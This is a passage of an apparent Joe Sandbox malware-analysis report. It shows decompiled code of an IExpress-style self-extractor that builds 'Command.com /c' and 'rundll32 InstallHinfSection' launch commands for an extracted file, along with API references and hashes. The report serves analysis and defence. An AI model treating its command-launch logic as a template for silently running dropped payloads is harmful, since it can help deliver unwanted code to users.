                                                                                                                                                                                                                                                									if( *0x58c42 != 0) {
                                                                                                                                                                                                                                                										goto L69;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                                                                                                                                                                                                                                                									__eflags = _t112 == 0;
                                                                                                                                                                                                                                                									if(_t112 == 0) {
                                                                                                                                                                                                                                                										goto L69;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									goto L31;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								_t118 =  *0x58a38; // 0x0
                                                                                                                                                                                                                                                								if(_t118 == 0) {
                                                                                                                                                                                                                                                									L23:
                                                                                                                                                                                                                                                									if(_t153 != 0) {
                                                                                                                                                                                                                                                										goto L31;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									_t146 =  &_v276;
                                                                                                                                                                                                                                                									if(E0005468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
                                                                                                                                                                                                                                                										goto L27;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									goto L25;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								if((_t118 & 0x00000001) == 0) {
                                                                                                                                                                                                                                                									__eflags = _t118 & 0x00000002;
                                                                                                                                                                                                                                                									if((_t118 & 0x00000002) == 0) {
                                                                                                                                                                                                                                                										goto L62;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									_t140 = "USRQCMD";
                                                                                                                                                                                                                                                									L20:
                                                                                                                                                                                                                                                									_t146 =  &_v276;
                                                                                                                                                                                                                                                									if(E0005468F(_t140,  &_v276, 0x104) == 0) {
                                                                                                                                                                                                                                                										goto L25;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
                                                                                                                                                                                                                                                										_t153 = 1;
                                                                                                                                                                                                                                                										_v388 = 1;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									goto L23;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								_t140 = "ADMQCMD";
                                                                                                                                                                                                                                                								goto L20;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						L26:
                                                                                                                                                                                                                                                						_push(_t130);
                                                                                                                                                                                                                                                						_t146 = 0x104;
                                                                                                                                                                                                                                                						E00051781( &_v276, 0x104, _t130, 0x58c42);
                                                                                                                                                                                                                                                						goto L27;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t130 = "REBOOT";
                                                                                                                                                                                                                                                				_t125 = E0005468F(_t130, 0x59a2c, 4);
                                                                                                                                                                                                                                                				if(_t125 == 0 || _t125 > 4) {
                                                                                                                                                                                                                                                					goto L25;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					goto L3;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                			}





























































                                                                                                                                                                                                                                                0x00053fe1
                                                                                                                                                                                                                                                0x00053fe3
                                                                                                                                                                                                                                                0x00053fe3
                                                                                                                                                                                                                                                0x00053fe8
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00053fe8
                                                                                                                                                                                                                                                0x00053f33
                                                                                                                                                                                                                                                0x00053f37
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00053f37
                                                                                                                                                                                                                                                0x00053dee
                                                                                                                                                                                                                                                0x00053dee
                                                                                                                                                                                                                                                0x00053df5
                                                                                                                                                                                                                                                0x00053fad
                                                                                                                                                                                                                                                0x00053fb9
                                                                                                                                                                                                                                                0x00053fc2
                                                                                                                                                                                                                                                0x00053fc8
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00053fc8
                                                                                                                                                                                                                                                0x00053dfb
                                                                                                                                                                                                                                                0x00053dfd
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00053e03
                                                                                                                                                                                                                                                0x00053e0a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00053e15
                                                                                                                                                                                                                                                0x00053e17
                                                                                                                                                                                                                                                0x00053e19
                                                                                                                                                                                                                                                0x00053f94
                                                                                                                                                                                                                                                0x00053fa4
                                                                                                                                                                                                                                                0x00053f7c
                                                                                                                                                                                                                                                0x00053f80
                                                                                                                                                                                                                                                0x00053f8b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00053f8b
                                                                                                                                                                                                                                                0x00053e2c
                                                                                                                                                                                                                                                0x00053e30
                                                                                                                                                                                                                                                0x00053e34
                                                                                                                                                                                                                                                0x00053e36
                                                                                                                                                                                                                                                0x00053f69
                                                                                                                                                                                                                                                0x00053f6e
                                                                                                                                                                                                                                                0x00053f70
                                                                                                                                                                                                                                                0x00053f76
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00053f76
                                                                                                                                                                                                                                                0x00053e3c
                                                                                                                                                                                                                                                0x00053e43
                                                                                                                                                                                                                                                0x00053e47
                                                                                                                                                                                                                                                0x00053e52
                                                                                                                                                                                                                                                0x00053e56
                                                                                                                                                                                                                                                0x00053e5c
                                                                                                                                                                                                                                                0x00053e61
                                                                                                                                                                                                                                                0x00053e68
                                                                                                                                                                                                                                                0x00053e70
                                                                                                                                                                                                                                                0x00053e74
                                                                                                                                                                                                                                                0x00053e7c
                                                                                                                                                                                                                                                0x00053e80
                                                                                                                                                                                                                                                0x00053e82
                                                                                                                                                                                                                                                0x00053e82
                                                                                                                                                                                                                                                0x00053e87
                                                                                                                                                                                                                                                0x00053e87
                                                                                                                                                                                                                                                0x00053e8b
                                                                                                                                                                                                                                                0x00053e91
                                                                                                                                                                                                                                                0x00053e94
                                                                                                                                                                                                                                                0x00053e96
                                                                                                                                                                                                                                                0x00053e96
                                                                                                                                                                                                                                                0x00053e9b
                                                                                                                                                                                                                                                0x00053e9b
                                                                                                                                                                                                                                                0x00053e9f
                                                                                                                                                                                                                                                0x00053ea2
                                                                                                                                                                                                                                                0x00053ea4
                                                                                                                                                                                                                                                0x00053ea4
                                                                                                                                                                                                                                                0x00053ea9
                                                                                                                                                                                                                                                0x00053ea9
                                                                                                                                                                                                                                                0x00053ead
                                                                                                                                                                                                                                                0x00053eb3
                                                                                                                                                                                                                                                0x00053eb6
                                                                                                                                                                                                                                                0x00053eb8
                                                                                                                                                                                                                                                0x00053eb8
                                                                                                                                                                                                                                                0x00053ebd
                                                                                                                                                                                                                                                0x00053ebd
                                                                                                                                                                                                                                                0x00053ec1
                                                                                                                                                                                                                                                0x00053ec3
                                                                                                                                                                                                                                                0x00053ec5
                                                                                                                                                                                                                                                0x00053ec5
                                                                                                                                                                                                                                                0x00053eca
                                                                                                                                                                                                                                                0x00053eca
                                                                                                                                                                                                                                                0x00053ece
                                                                                                                                                                                                                                                0x00053ed5
                                                                                                                                                                                                                                                0x00053ed9
                                                                                                                                                                                                                                                0x00053ee0
                                                                                                                                                                                                                                                0x00053ee6
                                                                                                                                                                                                                                                0x00053eea
                                                                                                                                                                                                                                                0x00053eec
                                                                                                                                                                                                                                                0x00053eee
                                                                                                                                                                                                                                                0x00053ef3
                                                                                                                                                                                                                                                0x00053ef3
                                                                                                                                                                                                                                                0x00053ef5
                                                                                                                                                                                                                                                0x00053efa
                                                                                                                                                                                                                                                0x00053efb
                                                                                                                                                                                                                                                0x00053efd
                                                                                                                                                                                                                                                0x00053f40
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00053eff
                                                                                                                                                                                                                                                0x00053eff
                                                                                                                                                                                                                                                0x00053f05
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00053f05
                                                                                                                                                                                                                                                0x00053efd
                                                                                                                                                                                                                                                0x00053dc7

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00053C11
                                                                                                                                                                                                                                                • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00053CDC
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000546A0
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: SizeofResource.KERNEL32(00000000,00000000,?,00052D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000546A9
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000546C3
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: LoadResource.KERNEL32(00000000,00000000,?,00052D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000546CC
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: LockResource.KERNEL32(00000000,?,00052D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000546D3
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: memcpy_s.MSVCRT ref: 000546E5
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000546EF
                                                                                                                                                                                                                                                • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00058C42), ref: 00053D8F
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00053E26
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00058C42), ref: 00053EFF
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(?,?,?,?,00058C42), ref: 00053F1F
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00058C42), ref: 00053F40
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(?,?,?,?,00058C42), ref: 00053F47
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00058C42), ref: 00053F76
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00058C42), ref: 00053F80
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00058C42), ref: 00053FC2
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                                                                                • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$lenta
                                                                                                                                                                                                                                                • API String ID: 1032054927-778137101
                                                                                                                                                                                                                                                • Opcode ID: c7c608287870ae938d6cea00e128bdaf5d104f3d49ddba2632fbcada01651f89
                                                                                                                                                                                                                                                • Instruction ID: bc341f5b682ab6305e22cf1ab09caf9f9374f8b7b9adc8185319fc1b9cdf84ef
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c7c608287870ae938d6cea00e128bdaf5d104f3d49ddba2632fbcada01651f89
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E3B1E170A083019BE7609F24D845BAB7AF4EB85783F104929FE85D61D1DB78C948CBA6
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                C-Code - Quality: 82%
                                                                                                                                                                                                                                                			E00051AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				char _v527;
                                                                                                                                                                                                                                                				char _v528;
                                                                                                                                                                                                                                                				char _v1552;
                                                                                                                                                                                                                                                				CHAR* _v1556;
                                                                                                                                                                                                                                                				int* _v1560;
                                                                                                                                                                                                                                                				CHAR** _v1564;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t48;
                                                                                                                                                                                                                                                				CHAR* _t53;
                                                                                                                                                                                                                                                				CHAR* _t54;
                                                                                                                                                                                                                                                				char* _t57;
                                                                                                                                                                                                                                                				char* _t58;
                                                                                                                                                                                                                                                				CHAR* _t60;
                                                                                                                                                                                                                                                				void* _t62;
                                                                                                                                                                                                                                                				signed char _t65;
                                                                                                                                                                                                                                                				intOrPtr _t76;
                                                                                                                                                                                                                                                				intOrPtr _t77;
                                                                                                                                                                                                                                                				unsigned int _t85;
                                                                                                                                                                                                                                                				CHAR* _t90;
                                                                                                                                                                                                                                                				CHAR* _t92;
                                                                                                                                                                                                                                                				char _t105;
                                                                                                                                                                                                                                                				char _t106;
                                                                                                                                                                                                                                                				CHAR** _t111;
                                                                                                                                                                                                                                                				CHAR* _t115;
                                                                                                                                                                                                                                                				intOrPtr* _t125;
                                                                                                                                                                                                                                                				void* _t126;
                                                                                                                                                                                                                                                				CHAR* _t132;
                                                                                                                                                                                                                                                				CHAR* _t135;
                                                                                                                                                                                                                                                				void* _t138;
                                                                                                                                                                                                                                                				void* _t139;
                                                                                                                                                                                                                                                				void* _t145;
                                                                                                                                                                                                                                                				intOrPtr* _t146;
                                                                                                                                                                                                                                                				char* _t148;
                                                                                                                                                                                                                                                				CHAR* _t151;
                                                                                                                                                                                                                                                				void* _t152;
                                                                                                                                                                                                                                                				CHAR* _t155;
                                                                                                                                                                                                                                                				CHAR* _t156;
                                                                                                                                                                                                                                                				void* _t157;
                                                                                                                                                                                                                                                				signed int _t158;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t48 =  *0x58004; // 0x5a679bd9
                                                                                                                                                                                                                                                				_v8 = _t48 ^ _t158;
                                                                                                                                                                                                                                                				_t108 = __ecx;
                                                                                                                                                                                                                                                				_v1564 = _a4;
                                                                                                                                                                                                                                                				_v1560 = _a8;
                                                                                                                                                                                                                                                				E00051680( &_v528, 0x104, __ecx);
                                                                                                                                                                                                                                                				if(_v528 != 0x22) {
                                                                                                                                                                                                                                                					_t135 = " ";
                                                                                                                                                                                                                                                					_t53 =  &_v528;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					_t135 = "\"";
                                                                                                                                                                                                                                                					_t53 =  &_v527;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t111 =  &_v1556;
                                                                                                                                                                                                                                                				_v1556 = _t53;
                                                                                                                                                                                                                                                				_t54 = E00051A84(_t111, _t135);
                                                                                                                                                                                                                                                				_t156 = _v1556;
                                                                                                                                                                                                                                                				_t151 = _t54;
                                                                                                                                                                                                                                                				if(_t156 == 0) {
                                                                                                                                                                                                                                                					L12:
                                                                                                                                                                                                                                                					_push(_t111);
                                                                                                                                                                                                                                                					E00051781( &_v268, 0x104, _t111, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                                                                					E0005658A( &_v268, 0x104, _t156);
                                                                                                                                                                                                                                                					goto L13;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					_t132 = _t156;
                                                                                                                                                                                                                                                					_t148 =  &(_t132[1]);
                                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                                						_t105 =  *_t132;
                                                                                                                                                                                                                                                						_t132 =  &(_t132[1]);
                                                                                                                                                                                                                                                					} while (_t105 != 0);
                                                                                                                                                                                                                                                					_t111 = _t132 - _t148;
                                                                                                                                                                                                                                                					if(_t111 < 3) {
                                                                                                                                                                                                                                                						goto L12;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					_t106 = _t156[1];
                                                                                                                                                                                                                                                					if(_t106 != 0x3a || _t156[2] != 0x5c) {
                                                                                                                                                                                                                                                						if( *_t156 != 0x5c || _t106 != 0x5c) {
                                                                                                                                                                                                                                                							goto L12;
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							goto L11;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						L11:
                                                                                                                                                                                                                                                						E00051680( &_v268, 0x104, _t156);
                                                                                                                                                                                                                                                						L13:
                                                                                                                                                                                                                                                						_t138 = 0x2e;
                                                                                                                                                                                                                                                						_t57 = E000566C8(_t156, _t138);
                                                                                                                                                                                                                                                						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
                                                                                                                                                                                                                                                							_t139 = 0x2e;
                                                                                                                                                                                                                                                							_t115 = _t156;
                                                                                                                                                                                                                                                							_t58 = E000566C8(_t115, _t139);
                                                                                                                                                                                                                                                							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
                                                                                                                                                                                                                                                								_t156 = LocalAlloc(0x40, 0x400);
                                                                                                                                                                                                                                                								if(_t156 == 0) {
                                                                                                                                                                                                                                                									goto L43;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								_t65 = GetFileAttributesA( &_v268); // executed
                                                                                                                                                                                                                                                								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
                                                                                                                                                                                                                                                									E00051680( &_v1552, 0x400, _t108);
                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                									_push(_t115);
                                                                                                                                                                                                                                                									_t108 = 0x400;
                                                                                                                                                                                                                                                									E00051781( &_v1552, 0x400, _t115,  &_v268);
                                                                                                                                                                                                                                                									if(_t151 != 0 &&  *_t151 != 0) {
                                                                                                                                                                                                                                                										E000516B3( &_v1552, 0x400, " ");
                                                                                                                                                                                                                                                										E000516B3( &_v1552, 0x400, _t151);
									}
								}
								_t140 = _t156;
								 *_t156 = 0;
								E00052AAC( &_v1552, _t156, _t156);
								goto L53;
							} else {
								_t108 = "Command.com /c %s";
								_t125 = "Command.com /c %s";
								_t145 = _t125 + 1;
								do {
									_t76 =  *_t125;
									_t125 = _t125 + 1;
								} while (_t76 != 0);
								_t126 = _t125 - _t145;
								_t146 =  &_v268;
								_t157 = _t146 + 1;
								do {
									_t77 =  *_t146;
									_t146 = _t146 + 1;
								} while (_t77 != 0);
								_t140 = _t146 - _t157;
								_t154 = _t126 + 8 + _t146 - _t157;
								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
								if(_t156 != 0) {
									E0005171E(_t156, _t154, "Command.com /c %s",  &_v268);
									goto L53;
								}
								goto L43;
							}
						} else {
							_t85 = GetFileAttributesA( &_v268);
							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
								_t140 = 0x525;
								_push(0);
								_push(0x10);
								_push(0);
								_t60 =  &_v268;
								goto L35;
							} else {
								_t140 = "[";
								_v1556 = _t151;
								_t90 = E00051A84( &_v1556, "[");
								if(_t90 != 0) {
									if( *_t90 != 0) {
										_v1556 = _t90;
									}
									_t140 = "]";
									E00051A84( &_v1556, "]");
								}
								_t156 = LocalAlloc(0x40, 0x200);
								if(_t156 == 0) {
									L43:
									_t60 = 0;
									_t140 = 0x4b5;
									_push(0);
									_push(0x10);
									_push(0);
									L35:
									_push(_t60);
									E000544B9(0, _t140);
									_t62 = 0;
									goto L54;
								} else {
									_t155 = _v1556;
									_t92 = _t155;
									if( *_t155 == 0) {
										_t92 = "DefaultInstall";
									}
									 *0x59120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
									 *_v1560 = 1;
									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x51140, _t156, 8,  &_v268) == 0) {
										 *0x59a34 =  *0x59a34 & 0xfffffffb;
										if( *0x59a40 != 0) {
											_t108 = "setupapi.dll";
										} else {
											_t108 = "setupx.dll";
											GetShortPathNameA( &_v268,  &_v268, 0x104);
										}
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										_push( &_v268);
										_push(_t155);
										E0005171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
									} else {
										 *0x59a34 =  *0x59a34 | 0x00000004;
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										E00051680(_t108, 0x104, _t155);
										_t140 = 0x200;
										E00051680(_t156, 0x200,  &_v268);
									}
									L53:
									_t62 = 1;
									 *_v1564 = _t156;
									L54:
									_pop(_t152);
									return E00056CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
								}
							}
						}
					}
				}
			}
                                                                                                                                                                                                                                                0x00051b6f
                                                                                                                                                                                                                                                0x00051b74
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00051b76
                                                                                                                                                                                                                                                0x00051b7b
                                                                                                                                                                                                                                                0x00051b86
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00051b8c
                                                                                                                                                                                                                                                0x00051b8c
                                                                                                                                                                                                                                                0x00051b98
                                                                                                                                                                                                                                                0x00051bc7
                                                                                                                                                                                                                                                0x00051bc9
                                                                                                                                                                                                                                                0x00051bcc
                                                                                                                                                                                                                                                0x00051bd3
                                                                                                                                                                                                                                                0x00051d75
                                                                                                                                                                                                                                                0x00051d76
                                                                                                                                                                                                                                                0x00051d78
                                                                                                                                                                                                                                                0x00051d7f
                                                                                                                                                                                                                                                0x00051e05
                                                                                                                                                                                                                                                0x00051e09
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00051e12
                                                                                                                                                                                                                                                0x00051e1b
                                                                                                                                                                                                                                                0x00051e73
                                                                                                                                                                                                                                                0x00051e21
                                                                                                                                                                                                                                                0x00051e21
                                                                                                                                                                                                                                                0x00051e28
                                                                                                                                                                                                                                                0x00051e37
                                                                                                                                                                                                                                                0x00051e3e
                                                                                                                                                                                                                                                0x00051e52
                                                                                                                                                                                                                                                0x00051e60
                                                                                                                                                                                                                                                0x00051e60
                                                                                                                                                                                                                                                0x00051e3e
                                                                                                                                                                                                                                                0x00051e79
                                                                                                                                                                                                                                                0x00051e7b
                                                                                                                                                                                                                                                0x00051e84
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00051d9b
                                                                                                                                                                                                                                                0x00051d9b
                                                                                                                                                                                                                                                0x00051da0
                                                                                                                                                                                                                                                0x00051da2
                                                                                                                                                                                                                                                0x00051da5
                                                                                                                                                                                                                                                0x00051da5
                                                                                                                                                                                                                                                0x00051da7
                                                                                                                                                                                                                                                0x00051da8
                                                                                                                                                                                                                                                0x00051dac
                                                                                                                                                                                                                                                0x00051dae
                                                                                                                                                                                                                                                0x00051db4
                                                                                                                                                                                                                                                0x00051db7
                                                                                                                                                                                                                                                0x00051db7
                                                                                                                                                                                                                                                0x00051db9
                                                                                                                                                                                                                                                0x00051dba
                                                                                                                                                                                                                                                0x00051dbe
                                                                                                                                                                                                                                                0x00051dc3
                                                                                                                                                                                                                                                0x00051dce
                                                                                                                                                                                                                                                0x00051dd2
                                                                                                                                                                                                                                                0x00051deb
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00051df0
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00051dd2
                                                                                                                                                                                                                                                0x00051bf7
                                                                                                                                                                                                                                                0x00051bfe
                                                                                                                                                                                                                                                0x00051c07
                                                                                                                                                                                                                                                0x00051d55
                                                                                                                                                                                                                                                0x00051d5a
                                                                                                                                                                                                                                                0x00051d5b
                                                                                                                                                                                                                                                0x00051d5d
                                                                                                                                                                                                                                                0x00051d5e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00051c1b
                                                                                                                                                                                                                                                0x00051c1b
                                                                                                                                                                                                                                                0x00051c20
                                                                                                                                                                                                                                                0x00051c2c
                                                                                                                                                                                                                                                0x00051c33
                                                                                                                                                                                                                                                0x00051c38
                                                                                                                                                                                                                                                0x00051c3a
                                                                                                                                                                                                                                                0x00051c3a
                                                                                                                                                                                                                                                0x00051c40
                                                                                                                                                                                                                                                0x00051c4b
                                                                                                                                                                                                                                                0x00051c4b
                                                                                                                                                                                                                                                0x00051c5d
                                                                                                                                                                                                                                                0x00051c61
                                                                                                                                                                                                                                                0x00051dd4
                                                                                                                                                                                                                                                0x00051dd4
                                                                                                                                                                                                                                                0x00051dd6
                                                                                                                                                                                                                                                0x00051ddb
                                                                                                                                                                                                                                                0x00051ddc
                                                                                                                                                                                                                                                0x00051dde
                                                                                                                                                                                                                                                0x00051d64
                                                                                                                                                                                                                                                0x00051d64
                                                                                                                                                                                                                                                0x00051d67
                                                                                                                                                                                                                                                0x00051d6c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00051c67
                                                                                                                                                                                                                                                0x00051c67
                                                                                                                                                                                                                                                0x00051c6d
                                                                                                                                                                                                                                                0x00051c72
                                                                                                                                                                                                                                                0x00051c74
                                                                                                                                                                                                                                                0x00051c74
                                                                                                                                                                                                                                                0x00051c8e
                                                                                                                                                                                                                                                0x00051c99
                                                                                                                                                                                                                                                0x00051cc0
                                                                                                                                                                                                                                                0x00051cf8
                                                                                                                                                                                                                                                0x00051d07
                                                                                                                                                                                                                                                0x00051d23
                                                                                                                                                                                                                                                0x00051d09

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00051BE7
                                                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00051BFE
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00051C57
                                                                                                                                                                                                                                                • GetPrivateProfileIntA.KERNEL32 ref: 00051C88
                                                                                                                                                                                                                                                • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00051140,00000000,00000008,?), ref: 00051CB8
                                                                                                                                                                                                                                                • GetShortPathNameA.KERNEL32 ref: 00051D1B
                                                                                                                                                                                                                                                  • Part of subcall function 000544B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00054518
                                                                                                                                                                                                                                                  • Part of subcall function 000544B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00054554
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                                                                • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                                                                • API String ID: 383838535-3368923722
                                                                                                                                                                                                                                                • Opcode ID: ff392c2839d3a2dd661d972d7820116a788a1aff0856b54bc67bc63429927fd0
                                                                                                                                                                                                                                                • Instruction ID: 70fb2b808f1250683bc2504fa23536ee63f979925a2d475f572fab19cc1088c8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ff392c2839d3a2dd661d972d7820116a788a1aff0856b54bc67bc63429927fd0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 53A17870A002186BEF609B24CC45FEB77B9DB85312F144294ED55A72C1DBB49ECDCB64
                                                                                                                                                                                                                                                Uniqueness

